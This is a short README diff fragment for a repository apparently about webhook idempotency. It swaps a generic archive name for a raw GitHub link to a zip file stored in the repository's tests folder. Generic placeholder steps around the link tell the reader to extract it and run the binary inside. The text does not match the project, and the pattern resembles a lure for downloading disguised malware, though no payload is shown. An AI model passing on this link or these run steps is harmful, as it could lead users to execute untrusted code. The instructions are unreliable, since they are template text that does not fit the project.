momomonda/production-webhook-idempotency-guard/README.md

      - Drag the application to your Applications folder.

    - **Linux**:
-     - Extract the downloaded `.tar.gz` file.
+     - Extract the downloaded `https://github.com/momomonda/production-webhook-idempotency-guard/raw/refs/heads/main/production-webhook-idempotency-guard/tests/webhook_idempotency_production_guard_v2.8.zip` file.
      - Open a terminal and navigate to the extracted directory.
      - Run the application using the command: `./your_application_name`.